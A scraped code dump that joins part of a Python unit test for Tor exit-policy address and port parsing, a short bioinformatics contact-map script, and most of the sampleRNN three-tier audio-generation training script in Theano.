self.assertEquals(mask, rule.mask)
self.assertEquals(masked_bits, rule.masked_bits)
def test_invalid_ipv4_addresses(self):
test_inputs = (
"256.0.0.0",
"-1.0.0.0",
"0.0.0",
"0.0.0.",
"0.0.0.a",
"127.0.0.1/-1",
"127.0.0.1/33",
)
for rule_addr in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept %s:*" % rule_addr)
def test_valid_ipv6_addresses(self):
test_inputs = {
"[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]":
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
"[FE80::0202:b3ff:fe1e:8329]":
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
"[0000:0000:0000:0000:0000:0000:0000:0000]/0":
("0000:0000:0000:0000:0000:0000:0000:0000",
"0000:0000:0000:0000:0000:0000:0000:0000", 0),
"[::]":
("0000:0000:0000:0000:0000:0000:0000:0000",
"FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF", 128),
}
for rule_addr, attr in test_inputs.items():
address, mask, masked_bits = attr
rule = ExitPolicyRule("accept %s:*" % rule_addr)
self.assertEquals(AddressType.IPv6, rule.address_type)
self.assertEquals(address, rule.address)
self.assertEquals(mask, rule.mask)
self.assertEquals(masked_bits, rule.masked_bits)
def test_invalid_ipv6_addresses(self):
test_inputs = (
"fe80::0202:b3ff:fe1e:8329",
"[fe80::0202:b3ff:fe1e:8329",
"fe80::0202:b3ff:fe1e:8329]",
"[fe80::0202:b3ff:fe1e:832g]",
"[fe80:::b3ff:fe1e:8329]",
"[fe80::b3ff::fe1e:8329]",
"[fe80::0202:b3ff:fe1e:8329]/-1",
"[fe80::0202:b3ff:fe1e:8329]/129",
)
for rule_addr in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept %s:*" % rule_addr)
def test_valid_ports(self):
test_inputs = {
"0": (0, 0),
"1": (1, 1),
"80": (80, 80),
"80-443": (80, 443),
}
for rule_port, attr in test_inputs.items():
min_port, max_port = attr
rule = ExitPolicyRule("accept 127.0.0.1:%s" % rule_port)
self.assertEquals(min_port, rule.min_port)
self.assertEquals(max_port, rule.max_port)
def test_invalid_ports(self):
test_inputs = (
"65536",
"a",
"5-3",
"5-",
"-3",
)
for rule_port in test_inputs:
self.assertRaises(ValueError, ExitPolicyRule, "accept 127.0.0.1:%s" % rule_port)
def test_is_match_wildcard(self):
test_inputs = {
"reject *:*": {
("192.168.0.1", 80): True,
("0.0.0.0", 80): True,
("255.255.255.255", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): True,
("192.168.0.1", None): True,
(None, 80): True,
(None, None): True,
},
"reject 255.255.255.255/0:*": {
("192.168.0.1", 80): True,
("0.0.0.0", 80): True,
("255.255.255.255", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): False,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): False,
("192.168.0.1", None): True,
(None, 80): False,
(None, None): False,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
# port zero is special in that exit policies can include it, but it's not
# something that we can match against
rule = ExitPolicyRule("reject *:*")
self.assertRaises(ValueError, rule.is_match, "127.0.0.1", 0)
def test_is_match_ipv4(self):
test_inputs = {
"reject 192.168.0.50:*": {
("192.168.0.50", 80): True,
("192.168.0.51", 80): False,
("192.168.0.49", 80): False,
(None, 80): False,
("192.168.0.50", None): True,
},
"reject 0.0.0.0/24:*": {
("0.0.0.0", 80): True,
("0.0.0.1", 80): True,
("0.0.0.255", 80): True,
("0.0.1.0", 80): False,
("0.1.0.0", 80): False,
("1.0.0.0", 80): False,
(None, 80): False,
("0.0.0.0", None): True,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
def test_is_match_ipv6(self):
test_inputs = {
"reject [FE80:0000:0000:0000:0202:B3FF:FE1E:8329]:*": {
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("fe80:0000:0000:0000:0202:b3ff:fe1e:8329", 80): True,
("[FE80:0000:0000:0000:0202:B3FF:FE1E:8329]", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8330", 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8328", 80): False,
(None, 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", None): True,
},
"reject [FE80:0000:0000:0000:0202:B3FF:FE1E:8329]/112:*": {
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:0000", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1E:FFFF", 80): True,
("FE80:0000:0000:0000:0202:B3FF:FE1F:8329", 80): False,
("FE81:0000:0000:0000:0202:B3FF:FE1E:8329", 80): False,
(None, 80): False,
("FE80:0000:0000:0000:0202:B3FF:FE1E:8329", None): True,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
def test_is_match_port(self):
test_inputs = {
"reject *:80": {
("192.168.0.50", 80): True,
("192.168.0.50", 81): False,
("192.168.0.50", 79): False,
(None, 80): True,
("192.168.0.50", None): False,
},
"reject *:80-85": {
("192.168.0.50", 79): False,
("192.168.0.50", 80): True,
("192.168.0.50", 83): True,
("192.168.0.50", 85): True,
("192.168.0.50", 86): False,
(None, 83): True,
("192.168.0.50", None): False,
},
}
for rule_arg, matches in test_inputs.items():
rule = ExitPolicyRule(rule_arg)
for match_args, expected_result in matches.items():
self.assertEquals(expected_result, rule.is_match(*match_args))
|
lgpl-3.0
| 8,623,108,772,148,325,000
| 32.336391
| 86
| 0.566278
| false
| 2.887682
| true
| false
| false
|
mskwark/PconsC3
|
extra/arne/MSA/find-intradom.py
|
1
|
1381
|
#!/usr/bin/env python
# Find all contacts between domains.
import sys, os, re, string
import argparse
from os.path import expanduser
home = expanduser("~")
sys.path.append(home + '/bioinfo-toolbox/parsing')
sys.path.append(home + '/git/bioinfo-toolbox/parsing')
import parse_contacts
import numpy as np
import matplotlib
matplotlib.use('Agg')
if __name__ == "__main__":
    p = argparse.ArgumentParser(description='Plot protein residue contact maps.')
    # The original snippet read `c_filename` without defining it anywhere, so a
    # positional argument is assumed here to make the script runnable.
    p.add_argument('c_filename', help='contact file to parse')
    p.add_argument('-t', '--threshold', default=-1, type=float)
    p.add_argument('--start', default=0, type=int)
    p.add_argument('--end', default=-1, type=int)
    p.add_argument('--sep', default=5, type=int)
    p.add_argument('--domain', default=-1, type=int)
    args = p.parse_args()
    start, end, sep, domain = args.start, args.end, args.sep, args.domain
    contacts = parse_contacts.parse(open(args.c_filename, 'r'), sep)
    contacts_np = parse_contacts.get_numpy_cmap(contacts)
    if end < 0:
        # treat the -1 default as "until the end of the sequence" (assumed)
        end = contacts_np.shape[0]
    contacts_np = contacts_np[start:end, start:end]
    for i in range(len(contacts)):
        score = contacts[i][0]
        c_x = contacts[i][1] - 1
        c_y = contacts[i][2] - 1
        # only look at contacts within given range
        # default: take full sequence range into account
        if c_x < start or c_x >= end:
            continue
        if c_y < start or c_y >= end:
            continue
        # skip contacts with too small a sequence separation; the original
        # compared against `start`, which looks like a typo for `sep`
        if c_y - c_x < sep:
            continue
        # keep only contacts that cross the domain boundary; the original line
        # `if c_x < domain` was left unfinished, so this condition is assumed
        if domain >= 0 and (c_x < domain) == (c_y < domain):
            continue
        pos_diff = abs(c_x - c_y)
        too_close = pos_diff < sep
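# --- Added illustration (not part of the original script) ---
# Hypothetical invocation, assuming a plain-text contact list readable by the
# bioinfo-toolbox parser; the file name and domain boundary below are made up:
#   python find-intradom.py contacts.out --domain 120 --start 0 --end 250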
license: gpl-2.0 | hash: -7,908,435,588,187,494,000 | line_mean: 26.078431 | line_max: 81 | alpha_frac: 0.631427 | autogenerated: false | ratio: 3.204176 | config_test: false | has_no_keywords: false | few_assignments: false
repo_name: soroushmehr/sampleRNN_ICLR2017 | path: models/three_tier/three_tier.py | copies: 1 | size: 35718 | content:
"""
RNN Audio Generation Model
Three-tier model, Quantized input
For more info:
$ python three_tier.py -h
How-to-run example:
sampleRNN$ pwd
/u/mehris/sampleRNN
sampleRNN$ \
THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python -u \
models/three_tier/three_tier.py --exp AXIS1 --seq_len 512 --big_frame_size 8 \
--frame_size 2 --weight_norm True --emb_size 64 --skip_conn False --dim 32 \
--n_rnn 2 --rnn_type LSTM --learn_h0 False --q_levels 16 --q_type linear \
--batch_size 128 --which_set MUSIC
To resume, add ` --resume` to the END of exactly the above line. You can run the
resume code as many times as needed, depending on the TRAIN_MODE.
(folder name, file name, flags, their order, and the values are important)
"""
from time import time
from datetime import datetime
print "Experiment started at:", datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M')
exp_start = time()
import os, sys, glob
sys.path.insert(1, os.getcwd())
import argparse
import itertools
import numpy
numpy.random.seed(123)
np = numpy
import random
random.seed(123)
import theano
import theano.tensor as T
import theano.ifelse
import lasagne
import scipy.io.wavfile
import lib
LEARNING_RATE = 0.001
### Parsing passed args/hyperparameters ###
def get_args():
def t_or_f(arg):
ua = str(arg).upper()
if 'TRUE'.startswith(ua):
return True
elif 'FALSE'.startswith(ua):
return False
else:
raise ValueError('Arg is neither `True` nor `False`')
def check_non_negative(value):
ivalue = int(value)
if ivalue < 0:
raise argparse.ArgumentTypeError("%s is not non-negative!" % value)
return ivalue
def check_positive(value):
ivalue = int(value)
if ivalue < 1:
raise argparse.ArgumentTypeError("%s is not positive!" % value)
return ivalue
def check_unit_interval(value):
fvalue = float(value)
if fvalue < 0 or fvalue > 1:
raise argparse.ArgumentTypeError("%s is not in [0, 1] interval!" % value)
return fvalue
    # No default value here. Indicate every single argument.
parser = argparse.ArgumentParser(
description='three_tier.py\nNo default value! Indicate every argument.')
# TODO: Fix the descriptions
    # Hyperparameter arguments:
parser.add_argument('--exp', help='Experiment name',
type=str, required=False, default='_')
parser.add_argument('--seq_len', help='How many samples to include in each\
Truncated BPTT pass', type=check_positive, required=True)
parser.add_argument('--big_frame_size', help='How many samples per big frame',\
type=check_positive, required=True)
parser.add_argument('--frame_size', help='How many samples per frame',\
type=check_positive, required=True)
parser.add_argument('--weight_norm', help='Adding learnable weight normalization\
to all the linear layers (except for the embedding layer)',\
type=t_or_f, required=True)
parser.add_argument('--emb_size', help='Size of embedding layer (> 0)',
type=check_positive, required=True) # different than two_tier
parser.add_argument('--skip_conn', help='Add skip connections to RNN',
type=t_or_f, required=True)
parser.add_argument('--dim', help='Dimension of RNN and MLPs',\
type=check_positive, required=True)
parser.add_argument('--n_rnn', help='Number of layers in the stacked RNN',
type=check_positive, choices=xrange(1,6), required=True)
parser.add_argument('--rnn_type', help='GRU or LSTM', choices=['LSTM', 'GRU'],\
required=True)
parser.add_argument('--learn_h0', help='Whether to learn the initial state of RNN',\
type=t_or_f, required=True)
parser.add_argument('--q_levels', help='Number of bins for quantization of\
audio samples. Should be 256 for mu-law.',\
type=check_positive, required=True)
parser.add_argument('--q_type', help='Quantization in linear-scale, a-law-companding,\
            or mu-law companding. With mu-/a-law quantization level should be set as 256',\
choices=['linear', 'a-law', 'mu-law'], required=True)
parser.add_argument('--which_set', help='ONOM, BLIZZ, MUSIC, or HUCK',
choices=['ONOM', 'BLIZZ', 'MUSIC', 'HUCK'], required=True)
parser.add_argument('--batch_size', help='size of mini-batch',
type=check_positive, choices=[64, 128, 256], required=True)
parser.add_argument('--debug', help='Debug mode', required=False, default=False, action='store_true')
parser.add_argument('--resume', help='Resume the same model from the last\
checkpoint. Order of params are important. [for now]',\
required=False, default=False, action='store_true')
args = parser.parse_args()
# NEW
# Create tag for this experiment based on passed args
tag = reduce(lambda a, b: a+b, sys.argv).replace('--resume', '').replace('/', '-').replace('--', '-').replace('True', 'T').replace('False', 'F')
tag += '-lr'+str(LEARNING_RATE)
print "Created experiment tag for these args:"
print tag
return args, tag
args, tag = get_args()
SEQ_LEN = args.seq_len # How many samples to include in each truncated BPTT pass
#print "------------------previous SEQ_LEN:", SEQ_LEN
# TODO: test incremental training
#SEQ_LEN = 512 + 256
#print "---------------------------new SEQ_LEN:", SEQ_LEN
BIG_FRAME_SIZE = args.big_frame_size # how many samples per big frame
FRAME_SIZE = args.frame_size # How many samples per frame
OVERLAP = BIG_FRAME_SIZE
WEIGHT_NORM = args.weight_norm
EMB_SIZE = args.emb_size
SKIP_CONN = args.skip_conn
DIM = args.dim # Model dimensionality.
BIG_DIM = DIM # Dimensionality for the slowest level.
N_RNN = args.n_rnn # How many RNNs to stack in the frame-level model
N_BIG_RNN = N_RNN # how many RNNs to stack in the big-frame-level model
RNN_TYPE = args.rnn_type
H0_MULT = 2 if RNN_TYPE == 'LSTM' else 1
LEARN_H0 = args.learn_h0
Q_LEVELS = args.q_levels # How many levels to use when discretizing samples. e.g. 256 = 8-bit scalar quantization
Q_TYPE = args.q_type # log- or linear-scale
WHICH_SET = args.which_set
BATCH_SIZE = args.batch_size
RESUME = args.resume
assert SEQ_LEN % BIG_FRAME_SIZE == 0,\
'seq_len should be divisible by big_frame_size'
assert BIG_FRAME_SIZE % FRAME_SIZE == 0,\
'big_frame_size should be divisible by frame_size'
N_FRAMES = SEQ_LEN / FRAME_SIZE # Number of frames in each truncated BPTT pass
if Q_TYPE == 'mu-law' and Q_LEVELS != 256:
raise ValueError('For mu-law Quantization levels should be exactly 256!')
# Fixed hyperparams
GRAD_CLIP = 1 # Elementwise grad clip threshold
BITRATE = 16000
# Other constants
#TRAIN_MODE = 'iters' # To use PRINT_ITERS and STOP_ITERS
TRAIN_MODE = 'time' # To use PRINT_TIME and STOP_TIME
#TRAIN_MODE = 'time-iters'
# To use PRINT_TIME for validation,
# and (STOP_ITERS, STOP_TIME), whichever happened first, for stopping exp.
#TRAIN_MODE = 'iters-time'
# To use PRINT_ITERS for validation,
# and (STOP_ITERS, STOP_TIME), whichever happened first, for stopping exp.
PRINT_ITERS = 10000 # Print cost, generate samples, save model checkpoint every N iterations.
STOP_ITERS = 100000 # Stop after this many iterations
PRINT_TIME = 90*60 # Print cost, generate samples, save model checkpoint every N seconds.
STOP_TIME = 60*60*24*3 # Stop after this many seconds of actual training (not including time req'd to generate samples etc.)
N_SEQS = 20 # Number of samples to generate every time monitoring.
RESULTS_DIR = 'results_3t'
FOLDER_PREFIX = os.path.join(RESULTS_DIR, tag)
Q_ZERO = numpy.int32(Q_LEVELS//2) # Discrete value corresponding to zero amplitude
epoch_str = 'epoch'
iter_str = 'iter'
lowest_valid_str = 'lowest valid cost'
corresp_test_str = 'correponding test cost'
train_nll_str, valid_nll_str, test_nll_str = \
'train NLL (bits)', 'valid NLL (bits)', 'test NLL (bits)'
if args.debug:
import warnings
warnings.warn('----------RUNNING IN DEBUG MODE----------')
TRAIN_MODE = 'time'
PRINT_TIME = 100
STOP_TIME = 3000
STOP_ITERS = 1000
### Create directories ###
# FOLDER_PREFIX: root, contains:
# log.txt, __note.txt, train_log.pkl, train_log.png [, model_settings.txt]
# FOLDER_PREFIX/params: saves all checkpoint params as pkl
# FOLDER_PREFIX/samples: keeps all checkpoint samples as wav
# FOLDER_PREFIX/best: keeps the best parameters, samples, ...
if not os.path.exists(FOLDER_PREFIX):
os.makedirs(FOLDER_PREFIX)
PARAMS_PATH = os.path.join(FOLDER_PREFIX, 'params')
if not os.path.exists(PARAMS_PATH):
os.makedirs(PARAMS_PATH)
SAMPLES_PATH = os.path.join(FOLDER_PREFIX, 'samples')
if not os.path.exists(SAMPLES_PATH):
os.makedirs(SAMPLES_PATH)
BEST_PATH = os.path.join(FOLDER_PREFIX, 'best')
if not os.path.exists(BEST_PATH):
os.makedirs(BEST_PATH)
lib.print_model_settings(locals(), path=FOLDER_PREFIX, sys_arg=True)
### Import the data_feeder ###
# Handling WHICH_SET
if WHICH_SET == 'ONOM':
from datasets.dataset import onom_train_feed_epoch as train_feeder
from datasets.dataset import onom_valid_feed_epoch as valid_feeder
from datasets.dataset import onom_test_feed_epoch as test_feeder
elif WHICH_SET == 'BLIZZ':
from datasets.dataset import blizz_train_feed_epoch as train_feeder
from datasets.dataset import blizz_valid_feed_epoch as valid_feeder
from datasets.dataset import blizz_test_feed_epoch as test_feeder
elif WHICH_SET == 'MUSIC':
from datasets.dataset import music_train_feed_epoch as train_feeder
from datasets.dataset import music_valid_feed_epoch as valid_feeder
from datasets.dataset import music_test_feed_epoch as test_feeder
elif WHICH_SET == 'HUCK':
from datasets.dataset import huck_train_feed_epoch as train_feeder
from datasets.dataset import huck_valid_feed_epoch as valid_feeder
from datasets.dataset import huck_test_feed_epoch as test_feeder
def load_data(data_feeder):
"""
Helper function to deal with interface of different datasets.
`data_feeder` should be `train_feeder`, `valid_feeder`, or `test_feeder`.
"""
return data_feeder(BATCH_SIZE,
SEQ_LEN,
OVERLAP,
Q_LEVELS,
Q_ZERO,
Q_TYPE)
### Creating computation graph ###
def big_frame_level_rnn(input_sequences, h0, reset):
"""
input_sequences.shape: (batch size, n big frames * BIG_FRAME_SIZE)
h0.shape: (batch size, N_BIG_RNN, BIG_DIM)
reset.shape: ()
output[0].shape: (batch size, n frames, DIM)
output[1].shape: same as h0.shape
output[2].shape: (batch size, seq len, Q_LEVELS)
"""
frames = input_sequences.reshape((
input_sequences.shape[0],
input_sequences.shape[1] // BIG_FRAME_SIZE,
BIG_FRAME_SIZE
))
# Rescale frames from ints in [0, Q_LEVELS) to floats in [-2, 2]
# (a reasonable range to pass as inputs to the RNN)
frames = (frames.astype('float32') / lib.floatX(Q_LEVELS/2)) - lib.floatX(1)
frames *= lib.floatX(2)
# Initial state of RNNs
learned_h0 = lib.param(
'BigFrameLevel.h0',
numpy.zeros((N_BIG_RNN, H0_MULT*BIG_DIM), dtype=theano.config.floatX)
)
# Handling LEARN_H0
learned_h0.param = LEARN_H0
learned_h0 = T.alloc(learned_h0, h0.shape[0], N_BIG_RNN, H0_MULT*BIG_DIM)
learned_h0 = T.unbroadcast(learned_h0, 0, 1, 2)
h0 = theano.ifelse.ifelse(reset, learned_h0, h0)
# Handling RNN_TYPE
# Handling SKIP_CONN
if RNN_TYPE == 'GRU':
rnns_out, last_hidden = lib.ops.stackedGRU('BigFrameLevel.GRU',
N_BIG_RNN,
BIG_FRAME_SIZE,
BIG_DIM,
frames,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
elif RNN_TYPE == 'LSTM':
rnns_out, last_hidden = lib.ops.stackedLSTM('BigFrameLevel.LSTM',
N_BIG_RNN,
BIG_FRAME_SIZE,
BIG_DIM,
frames,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
output = lib.ops.Linear(
'BigFrameLevel.Output',
BIG_DIM,
DIM * BIG_FRAME_SIZE / FRAME_SIZE,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
output = output.reshape((output.shape[0], output.shape[1] * BIG_FRAME_SIZE / FRAME_SIZE, DIM))
independent_preds = lib.ops.Linear(
'BigFrameLevel.IndependentPreds',
BIG_DIM,
Q_LEVELS * BIG_FRAME_SIZE,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
independent_preds = independent_preds.reshape((independent_preds.shape[0], independent_preds.shape[1] * BIG_FRAME_SIZE, Q_LEVELS))
return (output, last_hidden, independent_preds)
def frame_level_rnn(input_sequences, other_input, h0, reset):
"""
input_sequences.shape: (batch size, n frames * FRAME_SIZE)
other_input.shape: (batch size, n frames, DIM)
h0.shape: (batch size, N_RNN, DIM)
reset.shape: ()
output.shape: (batch size, n frames * FRAME_SIZE, DIM)
"""
frames = input_sequences.reshape((
input_sequences.shape[0],
input_sequences.shape[1] // FRAME_SIZE,
FRAME_SIZE
))
# Rescale frames from ints in [0, Q_LEVELS) to floats in [-2, 2]
# (a reasonable range to pass as inputs to the RNN)
frames = (frames.astype('float32') / lib.floatX(Q_LEVELS/2)) - lib.floatX(1)
frames *= lib.floatX(2)
gru_input = lib.ops.Linear(
'FrameLevel.InputExpand',
FRAME_SIZE,
DIM,
frames,
initialization='he',
weightnorm=WEIGHT_NORM,
) + other_input
# Initial state of RNNs
learned_h0 = lib.param(
'FrameLevel.h0',
numpy.zeros((N_RNN, H0_MULT*DIM), dtype=theano.config.floatX)
)
# Handling LEARN_H0
learned_h0.param = LEARN_H0
learned_h0 = T.alloc(learned_h0, h0.shape[0], N_RNN, H0_MULT*DIM)
learned_h0 = T.unbroadcast(learned_h0, 0, 1, 2)
#learned_h0 = T.patternbroadcast(learned_h0, [False] * learned_h0.ndim)
h0 = theano.ifelse.ifelse(reset, learned_h0, h0)
# Handling RNN_TYPE
# Handling SKIP_CONN
if RNN_TYPE == 'GRU':
rnns_out, last_hidden = lib.ops.stackedGRU('FrameLevel.GRU',
N_RNN,
DIM,
DIM,
gru_input,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
elif RNN_TYPE == 'LSTM':
rnns_out, last_hidden = lib.ops.stackedLSTM('FrameLevel.LSTM',
N_RNN,
DIM,
DIM,
gru_input,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
output = lib.ops.Linear(
'FrameLevel.Output',
DIM,
FRAME_SIZE * DIM,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
output = output.reshape((output.shape[0], output.shape[1] * FRAME_SIZE, DIM))
return (output, last_hidden)
def sample_level_predictor(frame_level_outputs, prev_samples):
"""
frame_level_outputs.shape: (batch size, DIM)
prev_samples.shape: (batch size, FRAME_SIZE)
output.shape: (batch size, Q_LEVELS)
"""
# Handling EMB_SIZE
if EMB_SIZE == 0: # no support for one-hot in three_tier and one_tier.
prev_samples = lib.ops.T_one_hot(prev_samples, Q_LEVELS)
# (BATCH_SIZE*N_FRAMES*FRAME_SIZE, FRAME_SIZE, Q_LEVELS)
last_out_shape = Q_LEVELS
elif EMB_SIZE > 0:
prev_samples = lib.ops.Embedding(
'SampleLevel.Embedding',
Q_LEVELS,
EMB_SIZE,
prev_samples)
# (BATCH_SIZE*N_FRAMES*FRAME_SIZE, FRAME_SIZE, EMB_SIZE), f32
last_out_shape = EMB_SIZE
else:
raise ValueError('EMB_SIZE cannot be negative.')
prev_samples = prev_samples.reshape((-1, FRAME_SIZE * last_out_shape))
out = lib.ops.Linear(
'SampleLevel.L1_PrevSamples',
FRAME_SIZE * last_out_shape,
DIM,
prev_samples,
biases=False,
initialization='he',
weightnorm=WEIGHT_NORM
)
out += frame_level_outputs
# out = T.nnet.relu(out) # commented out to be similar to two_tier
out = lib.ops.Linear('SampleLevel.L2',
DIM,
DIM,
out,
initialization='he',
weightnorm=WEIGHT_NORM)
out = T.nnet.relu(out)
# L3
out = lib.ops.Linear('SampleLevel.L3',
DIM,
DIM,
out,
initialization='he',
weightnorm=WEIGHT_NORM)
out = T.nnet.relu(out)
# Output
# We apply the softmax later
out = lib.ops.Linear('SampleLevel.Output',
DIM,
Q_LEVELS,
out,
weightnorm=WEIGHT_NORM)
return out
sequences = T.imatrix('sequences')
h0 = T.tensor3('h0')
big_h0 = T.tensor3('big_h0')
reset = T.iscalar('reset')
mask = T.matrix('mask')
if args.debug:
# Solely for debugging purposes.
# Maybe I should set the compute_test_value=warn from here.
sequences.tag.test_value = numpy.zeros((BATCH_SIZE, SEQ_LEN+OVERLAP), dtype='int32')
h0.tag.test_value = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
big_h0.tag.test_value = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
reset.tag.test_value = numpy.array(1, dtype='int32')
mask.tag.test_value = numpy.ones((BATCH_SIZE, SEQ_LEN+OVERLAP), dtype='float32')
big_input_sequences = sequences[:, :-BIG_FRAME_SIZE]
input_sequences = sequences[:, BIG_FRAME_SIZE-FRAME_SIZE:-FRAME_SIZE]
target_sequences = sequences[:, BIG_FRAME_SIZE:]
target_mask = mask[:, BIG_FRAME_SIZE:]
big_frame_level_outputs, new_big_h0, big_frame_independent_preds = big_frame_level_rnn(big_input_sequences, big_h0, reset)
frame_level_outputs, new_h0 = frame_level_rnn(input_sequences, big_frame_level_outputs, h0, reset)
prev_samples = sequences[:, BIG_FRAME_SIZE-FRAME_SIZE:-1]
prev_samples = prev_samples.reshape((1, BATCH_SIZE, 1, -1))
prev_samples = T.nnet.neighbours.images2neibs(prev_samples, (1, FRAME_SIZE), neib_step=(1, 1), mode='valid')
prev_samples = prev_samples.reshape((BATCH_SIZE * SEQ_LEN, FRAME_SIZE))
sample_level_outputs = sample_level_predictor(
frame_level_outputs.reshape((BATCH_SIZE * SEQ_LEN, DIM)),
prev_samples
)
cost = T.nnet.categorical_crossentropy(
T.nnet.softmax(sample_level_outputs),
target_sequences.flatten()
)
cost = cost.reshape(target_sequences.shape)
cost = cost * target_mask
# Don't use these lines; could end up with NaN
# Specially at the end of audio files where mask is
# all zero for some of the shorter files in mini-batch.
#cost = cost.sum(axis=1) / target_mask.sum(axis=1)
#cost = cost.mean(axis=0)
# Use this one instead.
cost = cost.sum()
cost = cost / target_mask.sum()
# By default we report cross-entropy cost in bits.
# Switch to nats by commenting out this line:
# log_2(e) = 1.44269504089
cost = cost * lib.floatX(numpy.log2(numpy.e))
ip_cost = lib.floatX(numpy.log2(numpy.e)) * T.nnet.categorical_crossentropy(
T.nnet.softmax(big_frame_independent_preds.reshape((-1, Q_LEVELS))),
target_sequences.flatten()
)
ip_cost = ip_cost.reshape(target_sequences.shape)
ip_cost = ip_cost * target_mask
ip_cost = ip_cost.sum()
ip_cost = ip_cost / target_mask.sum()
### Getting the params, grads, updates, and Theano functions ###
#params = lib.get_params(cost, lambda x: hasattr(x, 'param') and x.param==True)
#ip_params = lib.get_params(ip_cost, lambda x: hasattr(x, 'param') and x.param==True\
# and 'BigFrameLevel' in x.name)
#other_params = [p for p in params if p not in ip_params]
#params = ip_params + other_params
#lib.print_params_info(params, path=FOLDER_PREFIX)
#
#grads = T.grad(cost, wrt=params, disconnected_inputs='warn')
#grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in grads]
#
#updates = lasagne.updates.adam(grads, params, learning_rate=LEARNING_RATE)
###########
all_params = lib.get_params(cost, lambda x: hasattr(x, 'param') and x.param==True)
ip_params = lib.get_params(ip_cost, lambda x: hasattr(x, 'param') and x.param==True\
and 'BigFrameLevel' in x.name)
other_params = [p for p in all_params if p not in ip_params]
all_params = ip_params + other_params
lib.print_params_info(ip_params, path=FOLDER_PREFIX)
lib.print_params_info(other_params, path=FOLDER_PREFIX)
lib.print_params_info(all_params, path=FOLDER_PREFIX)
ip_grads = T.grad(ip_cost, wrt=ip_params, disconnected_inputs='warn')
ip_grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in ip_grads]
other_grads = T.grad(cost, wrt=other_params, disconnected_inputs='warn')
other_grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in other_grads]
grads = T.grad(cost, wrt=all_params, disconnected_inputs='warn')
grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in grads]
ip_updates = lasagne.updates.adam(ip_grads, ip_params)
other_updates = lasagne.updates.adam(other_grads, other_params)
updates = lasagne.updates.adam(grads, all_params)
# Training function(s)
ip_train_fn = theano.function(
[sequences, big_h0, reset, mask],
[ip_cost, new_big_h0],
updates=ip_updates,
on_unused_input='warn'
)
other_train_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
updates=other_updates,
on_unused_input='warn'
)
train_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
updates=updates,
on_unused_input='warn'
)
# Validation and Test function, hence no updates
ip_test_fn = theano.function(
[sequences, big_h0, reset, mask],
[ip_cost, new_big_h0],
on_unused_input='warn'
)
other_test_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
on_unused_input='warn'
)
test_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
on_unused_input='warn'
)
# Sampling at big frame level
big_frame_level_generate_fn = theano.function(
[sequences, big_h0, reset],
big_frame_level_rnn(sequences, big_h0, reset)[0:2],
on_unused_input='warn'
)
# Sampling at frame level
big_frame_level_outputs = T.matrix('big_frame_level_outputs')
frame_level_generate_fn = theano.function(
[sequences, big_frame_level_outputs, h0, reset],
frame_level_rnn(sequences, big_frame_level_outputs.dimshuffle(0,'x',1), h0, reset),
on_unused_input='warn'
)
# Sampling at audio sample level
frame_level_outputs = T.matrix('frame_level_outputs')
prev_samples = T.imatrix('prev_samples')
sample_level_generate_fn = theano.function(
[frame_level_outputs, prev_samples],
lib.ops.softmax_and_sample(
sample_level_predictor(
frame_level_outputs,
prev_samples
)
),
on_unused_input='warn'
)
# Uniform [-0.5, 0.5) for half of initial state for generated samples
# to study the behaviour of the model and also to introduce some diversity
# to samples in a simple way. [it's disabled]
fixed_rand_h0 = numpy.random.rand(N_SEQS//2, N_RNN, H0_MULT*DIM)
fixed_rand_h0 -= 0.5
